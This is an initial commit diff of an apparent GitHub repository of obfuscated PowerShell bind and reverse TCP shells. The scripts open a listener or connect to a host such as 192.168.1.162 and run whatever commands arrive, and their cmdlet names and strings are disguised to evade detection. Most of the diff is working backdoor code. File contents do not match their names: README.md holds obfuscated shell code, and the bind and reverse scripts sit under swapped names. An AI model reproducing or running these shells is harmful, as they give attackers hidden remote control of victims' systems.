Initial Commit

Author: ivan-sincek

.gitattributes

@@ -0,0 +1,2 @@
+# Auto detect text files and perform LF normalization
+* text=auto

LICENSE

@@ -0,0 +1,21 @@
+MIT License
+
+Copyright (c) 2019 Ivan Šincek
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.

README.md

@@ -0,0 +1,87 @@
+# change the port number as necessary
+# obfuscated port number, same as $p = 9000;
+$p = 1000 + 1000 + 1000 + 6000;
+$cz56V= " ))43]RAhC[]GnIrtS[,)94]RAhC[+97]RAhC[+801]RAhC[((ECalPER.)93]RAhC[]GnIrtS[,'j0g'(ECalPER.)421]RAhC[]GnIrtS[,'oCr'(ECalPER.)63]RAhC[]GnIrtS[,'K6u'(ECalPER.)'`','TqJ'(ECalPER.)'}
+;)()j0gTCELj0g + j0gLOCj0g(::]CG[
+}
+;d )*V-ra* MTqJCTqJGTqJ( &
+{ )llu'+'nK6u en- dK6u( fi
+}
+;r )*V-ra* '+'MTqJCTqJG'+'TqJ('+' &
+{ )llunK6u en- rK6u( fi
+}
+;b )'+'*V-ra'+'* MTqJCTqJGTqJ( &
+;)(raelC.bK'+'6u
+{ )llunK6u en- bK6u( fi
+}
+;c )*V-ra* MTqJCTqJGTqJ( &
+;)(esopsiD.cK6u ;)(esolC.cK6u
+{ )ll'+'unK6u en- cK6u( fi
+}
+;s )*V-ra* MTqJCTqJGTqJ( '+'&
+;)(esopsiD.sK6u ;)(es'+'olC.sK6u
+{ )llunK6u en- sK6u( fi
+'+'}
+;w )*V-ra* MTqJCTqJGTqJ( &
+;'+')(esopsiD.wK6u ;)(esolC'+'.wK6u
+{'+' )llunK6u en- wK6u( fi
+}
+;l )*V-ra* MTqJCTqJGTqJ( &
+;)(esopsiD.revreS.lK6u ;)(esolC.revreS.lK6u
+{ )llu'+'nK6'+'u en- lK6u( fi
+{ yllanif }
+;eg'+'asseM.noitpecxErennI.noitpecxE'+'._K6u )??oH-e* MTqJCTq'+'JGTqJ( &
+{ hctac }
+;1'+'Ol!detcennocsid sah t'+'neilC1Ol )??oH-e* MTqJCTqJGTq'+'J( &
+;)0 tg- ybK6u( elih'+'w }'+'
+}
+}
+'+'}'+'
+;r )*V-ra* MTqJCTqJGTqJ( &
+;)rK6u(etirW.wK6u
+{ )0 tg- htgneL.rK6u( fi                '+'
+;d )*V-ra* MTqJCTqJGTqJ( &
+}+'
+;)?????S-tu* MTqJC'+'TqJGTqJ( & oCr noitp'+'ecxE._K6u = rK6u
+{ hctac }       '+'
+;)??'+'???S-tu* MTqJCTqJGTqJ( & oCr 1&>2 dK6u dnammoC- )*E-ek* MTqJCTqJGTqJ( & = rK6u
+{ yrt
+{ )0 tg-'+' htgneL.dK6u( fi
+;)(mirT.dK6u = dK6u
+{ )0 tg- ybK6u( fi
+;)elbali'+'avAataD.sK'+'6u( elihw }
+}       '+'     '+'
+;)ybK6u ,0 ,bK6u(gnirtSt'+'eG.eK6u =+ dK6u
+{ )0 tg- ybK6u( fi
+;)htg'+'neL.bK6u ,0 ,bK6'+'u(daeR.sK6u = ybK6u
+{ od
+;)1Ol>SP1Ol(etirW.wK6u
+{ od
+;0 = ybK6u
+;1Ol1Ol )??o'+'H-e* '+'MTqJCTqJGTqJ'+'( &
+;1Ol!detcennoc sah tneilC'+'1Ol '+')??'+'oH-e* MTqJCTqJGTqJ( &
+;eurtK6u = '+'hsulFotuA.wK6u
+;)j0g)4201 ,8FTU::]gnidocnE.txeT[ ,sK6u(RTqJETqJTTqJITqJRT'+'qJWTqJMTqJATqJETqJRTqJTTqJSTqJ.T'+'qJ'+'OTqJITqJ'+' )*O-we* MTqJCTqJGTqJ( &j0g )*E-ek* MTqJCTq'+'JGTqJ( &( '+'= wK6u
+;gnidocnE8FTU.txeT )*O-we* MTqJCTqJGTqJ( & = eK6u
+'+';)21 - 21 + '+'4201( ][etyB )*O-we* MTqJCT'+'qJGTqJ( & = bK6u
+;)(maertSteG.cK6u = sK6u
+;)(potS.lK6u
+;'+')llunK6u qe- c'+'K6u( elihw }
+}
+;005 sdnocesilliM- )*lS-t* MTqJCTqJGTqJ( &      '+'
+{'+' esle }
+;)(tnei'+'lCpcTtpeccA.lK6u = cK6u
+{ ))(gnidn'+'eP.lK6u( fi
+{ od
+;1Ol1Ol )??oH-e* MTqJCTqJGTqJ( &
+;1Ol...tcennoc ot tneilc rof gnitiaW1Ol )??oH-e'+'* MTqJCTqJGTqJ'+'( &
+;1Ol1Ol )??oH-e* M'+'TqJCTqJGTqJ( &
+;1Ol...gninnur dna pu si roodkcaB1Ol )??oH-e* MTqJCTqJGTqJ( &
+;)(tratS.lK6u
+;)j0g)pK6u ,1Ol0.0.0.01Ol(RTqJETqJNT'+'qJETqJT'+'T'+'qJSTqJITqJLTqJPTqJCTqJTTqJ.'+'TqJS'+'TqJTTqJETqJKTqJCTqJOTqJSTqJ.TqJTTqJETqJ'+'NTqJ )*O-we* MTqJCTqJGTqJ( &j0g )*E-ek* MTqJC'+'TqJGTqJ('+' &( = lK6u
+{ yrt
+;ll'+'unK6u = rK6u = dK6u = wK6u = bK6u = sK6u = cK6u = lK6u
+;1Ol.pct-esrever-lleh'+'srewop/kecnis-navi/moc.buhtig ta yrotisoper'+' buHtiG1Ol )??oH-e* MTqJCTqJGTqJ( &
+;1Ol.kecniS nav'+'I yb 0.4v'+' PCT d'+'niB llehSrewoP1Ol )??oH-e* MTqJCTqJGTqJ( &'(()'x'+]31[DiLLehs$+]1[DiLlEhS$ ( .  ";  &((VaRIAble '*mDR*').namE[3,11,2]-JoIn'')([sTRInG]::JOIN('',$CZ56v[-1.. -($CZ56v.lEngTh)] ));
+& (`G`C`M *ar-V*) p;
+& (`G`C`M *ar-V*) cz56V;

src/invoke_expression/obfuscated/invoke_obfuscation/powershell_bind_tcp_obfuscated.ps1

@@ -0,0 +1,73 @@
+# change the host address and/or port number as necessary
+# obfuscated host address, same as $a = "127.0.0.1";
+$a = "127" + "." + "0" + "." + "0" + "." + "1";
+# obfuscated port number, same as $p = 9000;
+$p = 1000 + 1000 + 1000 + 6000;
+$kT2r9V =  [chAR[ ] ]" ) )93]raHC[,'but'ecALpERc-69]raHC[,'SWT'eCAlpeR-63]raHC[,)76]raHC[+87]raHC[+09]raHC[( ecALpERc- 43]raHC[,)78]raHC[+56]raHC[+801]raHC[(eCAlpeR-421]raHC[,)211]raHC[+67]raHC[+201]raHC[(eCAlpeR-  )'}
+;)()butT'+'CEL'+'but + butLOCbut(::]CG[
+}
+;d )*V-'+'ra* MSWTCSWTGSWT( &
+{ )llunCNZ en- dCNZ'+'( fi
+}
+;r )*V-ra* MSWTCSWTGSWT( &
+{ )llunCNZ en- rCNZ( fi
+}
+;b )*V-ra* MSWTCSWTGSWT( &
+;)(raelC.bCNZ
+{ )llunCNZ en- bCNZ( fi
+}
+;c )*V-ra* MSWTCSWTGSWT( &
+;)(esopsiD.cCNZ ;)(esolC.cCNZ
+{ )llunCNZ en- cCNZ( fi
+}
+;s )*V-ra* MSWTCSWTGSWT'+'( &
+;)(esopsiD.sCNZ ;)(esolC.sCNZ
+{'+' )llunCNZ en- sCNZ( fi
+}
+;w )*V-ra* MSWTCSWTGSWT( &
+;)(esopsiD.wCNZ ;)(esolC.wCNZ
+{ )llunCNZ en- wCNZ( fi
+{ yllanif }
+;'+'egasseM.noitpecxErennI.noitpecxE._CNZ )??oH-e* MSWTCSWTGSWT( &
+{ hc'+'tac }
+;WAl...tixe won lliw roodkcaBWAl )??o'+'H-e* MSWTCSWTGSW'+'T( &
+;)0 tg- y'+'bCNZ( elihw }
+}
+}
+}
+;r )*V-'+'ra* MSWTCSWTGSWT( &
+;)rCNZ(etirW'+'.wCNZ'+'
+{ )0 tg- htgneL.rCNZ( fi
+;d )*V-ra* MSWTCSWTGSWT( &
+}
+;)?????S-tu* '+'MSWTCSWTGSWT( & pLf'+' noitpecxE._CNZ = rCNZ
+{ hctac }
+;)?????S-tu* MSWTCSWTGS'+'WT( & pLf 1&>2 dCNZ dnammoC- )*E-ek* MSWTCSWTGSWT( & = rCNZ
+{ yrt
+{ )0 tg- htgneL.dCNZ( fi
+;)(mirT.dCNZ = dCNZ
+{ )0 tg- ybCNZ( fi
+;)elbal'+'iavAataD.sCNZ( elihw }
+}
+;)ybCNZ ,0 '+',bCNZ(gnirtSteG.eCNZ =+ dCNZ
+{ )0'+' tg- ybCNZ('+' fi
+;)htgneL.bCNZ ,0 ,bCNZ(daeR.sCNZ = ybCNZ
+{ od            '+'
+;)WAl>SPWAl(etirW.wCNZ
+{ od
+;0 = '+'ybCNZ
+;WAlWAl'+' )??oH-e* MSWTCSWTGSWT( &
+;WAl...gninnur dna pu si roodkcaBWAl '+')??oH-e* MSW'+'TCSWTGSWT( &
+;eurtCNZ = hsulFotuA.wCNZ
+;)but)4201 ,8FT'+'U::]gn'+'idocnE.txeT[ ,sCNZ(RSWTESWTTSWTISWTRSWTWSWTMSWTASWTESWTRSWTTSWTSSWT.SWTOSWTISWT )*O-we* MSWTCS'+'WTGSWT( &b'+'ut'+' )*E-ek* MSWTCSWTGSWT( &( = wCNZ
+;gnidocnE8FTU.txeT )*O-we* MSWTCSWTGSWT( & = eCNZ
+;)21 - '+'21 + 4201('+' ][etyB )*O-we* MSWTCSWTGSWT( & = bCNZ
+;)(maertSteG.cCNZ = sCNZ
+;)but)pCNZ ,aCNZ(TSWTNSWTESWTISWTLSWTCSWTPSWTCSWTTSWT.SWTSSWTTSWTESWTKSWTCSWTOS'+'WTSSW'+'T.SWTTSWTESWTNSWT )*O-we* M'+'SWTCSWTG'+'SWT( &'+'but )*E-ek* MSWTCSWTGSWT( &( = cCNZ
+{'+' yrt
+;llunCNZ = rCNZ = dCNZ = wCNZ = bCN'+'Z = sCNZ = cCNZ
+;WAl.pct-esrever-llehsrewop/kecnis-navi/moc.buhtig ta yrotisoper buHtiGWAl )??oH-e* MSWTCSWTGSWT( &
+;WAl.kecniS navI yb 0.4v PCT esreveR llehSrewoPWAl )??oH-e* MSWTCSW'+'TGSWT( &'((( )''nIOJ-]52,62,4[cepSmoc:vNe$ (. ";  [aRRay]::REveRSE((lS  ("vARi"+"aBL"+"e:kT2R9v")).valuE) ;&( $sHeLLid[1]+$ShEllID[13]+'X')( -jOIN (lS  ("vARi"+"aBL"+"e:kT2R9v")).valuE );
+& (`G`C`M *ar-V*) a;
+& (`G`C`M *ar-V*) p;
+& (`G`C`M *ar-V*) kT2r9V;

src/invoke_expression/obfuscated/invoke_obfuscation/powershell_reverse_tcp_obfuscated.ps1

@@ -0,0 +1,86 @@
+# change the port number as necessary
+# obfuscated port number, same as $p = 9000;
+$p = 1000 + 1000 + 1000 + 6000;
+& (`G`C`M *e-Ho??) "PowerShell Bind TCP v4.0 by Ivan Sincek.";
+& (`G`C`M *e-Ho??) "GitHub repository at github.com/ivan-sincek/powershell-reverse-tcp.";
+$l = $c = $s = $b = $w = $d = $r = $null;
+try {
+	$l = (& (`G`C`M *ke-E*) '& (`G`C`M *ew-O*) `N`E`T`.`S`O`C`K`E`T`S`.`T`C`P`L`I`S`T`E`N`E`R("0.0.0.0", $p)');
+	$l.Start();
+	& (`G`C`M *e-Ho??) "Backdoor is up and running...";
+	& (`G`C`M *e-Ho??) "";
+	& (`G`C`M *e-Ho??) "Waiting for client to connect...";
+	& (`G`C`M *e-Ho??) "";
+	do {
+		if ($l.Pending()) {
+			$c = $l.AcceptTcpClient();
+		} else {
+			& (`G`C`M *t-Sl*) -Milliseconds 500;
+		}
+	} while ($c -eq $null);
+	$l.Stop();
+	$s = $c.GetStream();
+	$b = & (`G`C`M *ew-O*) Byte[] (1024 + 12 - 12);
+	$e = & (`G`C`M *ew-O*) Text.UTF8Encoding;
+	$w = (& (`G`C`M *ke-E*) '& (`G`C`M *ew-O*) `I`O`.`S`T`R`E`A`M`W`R`I`T`E`R($s, [Text.Encoding]::UTF8, 1024)');
+	$w.AutoFlush = $true;
+	& (`G`C`M *e-Ho??) "Client has connected!";
+	& (`G`C`M *e-Ho??) "";
+	$by = 0;
+	do {
+		$w.Write("PS>");
+		do {
+			$by = $s.Read($b, 0, $b.Length);
+			if ($by -gt 0) {
+				$d += $e.GetString($b, 0, $by);
+			}
+		} while ($s.DataAvailable);
+		if ($by -gt 0) {
+			$d = $d.Trim();
+			if ($d.Length -gt 0) {
+				try {
+					$r = & (`G`C`M *ke-E*) -Command $d 2>&1 | & (`G`C`M *ut-S?????);
+				} catch {
+					$r = $_.Exception | & (`G`C`M *ut-S?????);
+				}
+				& (`G`C`M *ar-V*) d;
+				if ($r.Length -gt 0) {
+					$w.Write($r);
+					& (`G`C`M *ar-V*) r;
+				}
+			}
+		}
+	} while ($by -gt 0);
+	& (`G`C`M *e-Ho??) "Client has disconnected!";
+} catch {
+	& (`G`C`M *e-Ho??) $_.Exception.InnerException.Message;
+} finally {
+	if ($l -ne $null) {
+		$l.Server.Close(); $l.Server.Dispose();
+		& (`G`C`M *ar-V*) l;
+	}
+	if ($w -ne $null) {
+		$w.Close(); $w.Dispose();
+		& (`G`C`M *ar-V*) w;
+	}
+	if ($s -ne $null) {
+		$s.Close(); $s.Dispose();
+		& (`G`C`M *ar-V*) s;
+	}
+	if ($c -ne $null) {
+		$c.Close(); $c.Dispose();
+		& (`G`C`M *ar-V*) c;
+	}
+	if ($b -ne $null) {
+		$b.Clear();
+		& (`G`C`M *ar-V*) b;
+	}
+	if ($r -ne $null) {
+		& (`G`C`M *ar-V*) r;
+	}
+	if ($d -ne $null) {
+		& (`G`C`M *ar-V*) d;
+	}
+	[GC]::('COL' + 'LECT')();
+}
+& (`G`C`M *ar-V*) p;

src/invoke_expression/obfuscated/powershell_bind_tcp_manual.ps1

@@ -0,0 +1,72 @@
+# change the host address and/or port number as necessary
+# obfuscated host address, same as $a = "127.0.0.1";
+$a = "192.168.1.162";
+# obfuscated port number, same as $p = 9000;
+$p = 1000 + 1000 + 1000 + 6000;
+& (`G`C`M *e-Ho??) "PowerShell Reverse TCP v4.0 by Ivan Sincek.";
+& (`G`C`M *e-Ho??) "GitHub repository at github.com/ivan-sincek/powershell-reverse-tcp.";
+$c = $s = $b = $w = $d = $r = $null;
+try {
+	$c = (& (`G`C`M *ke-E*) '& (`G`C`M *ew-O*) `N`E`T`.`S`O`C`K`E`T`S`.`T`C`P`C`L`I`E`N`T($a, $p)');
+	$s = $c.GetStream();
+	$b = & (`G`C`M *ew-O*) Byte[] (1024 + 12 - 12);
+	$e = & (`G`C`M *ew-O*) Text.UTF8Encoding;
+	$w = (& (`G`C`M *ke-E*) '& (`G`C`M *ew-O*) `I`O`.`S`T`R`E`A`M`W`R`I`T`E`R($s, [Text.Encoding]::UTF8, 1024)');
+	$w.AutoFlush = $true;
+	& (`G`C`M *e-Ho??) "Backdoor is up and running...";
+	& (`G`C`M *e-Ho??) "";
+	$by = 0;
+	do {
+		$w.Write("PS>");
+		do {
+			$by = $s.Read($b, 0, $b.Length);
+			if ($by -gt 0) {
+				$d += $e.GetString($b, 0, $by);
+			}
+		} while ($s.DataAvailable);
+		if ($by -gt 0) {
+			$d = $d.Trim();
+			if ($d.Length -gt 0) {
+				try {
+					$r = & (`G`C`M *ke-E*) -Command $d 2>&1 | & (`G`C`M *ut-S?????);
+				} catch {
+					$r = $_.Exception | & (`G`C`M *ut-S?????);
+				}
+				& (`G`C`M *ar-V*) d;
+				if ($r.Length -gt 0) {
+					$w.Write($r);
+					& (`G`C`M *ar-V*) r;
+				}
+			}
+		}
+	} while ($by -gt 0);
+	& (`G`C`M *e-Ho??) "Backdoor will now exit...";
+} catch {
+	& (`G`C`M *e-Ho??) $_.Exception.InnerException.Message;
+} finally {
+	if ($w -ne $null) {
+		$w.Close(); $w.Dispose();
+		& (`G`C`M *ar-V*) w;
+	}
+	if ($s -ne $null) {
+		$s.Close(); $s.Dispose();
+		& (`G`C`M *ar-V*) s;
+	}
+	if ($c -ne $null) {
+		$c.Close(); $c.Dispose();
+		& (`G`C`M *ar-V*) c;
+	}
+	if ($b -ne $null) {
+		$b.Clear();
+		& (`G`C`M *ar-V*) b;
+	}
+	if ($r -ne $null) {
+		& (`G`C`M *ar-V*) r;
+	}
+	if ($d -ne $null) {
+		& (`G`C`M *ar-V*) d;
+	}
+	[GC]::('COL' + 'LECT')();
+}
+& (`G`C`M *ar-V*) a;
+& (`G`C`M *ar-V*) p;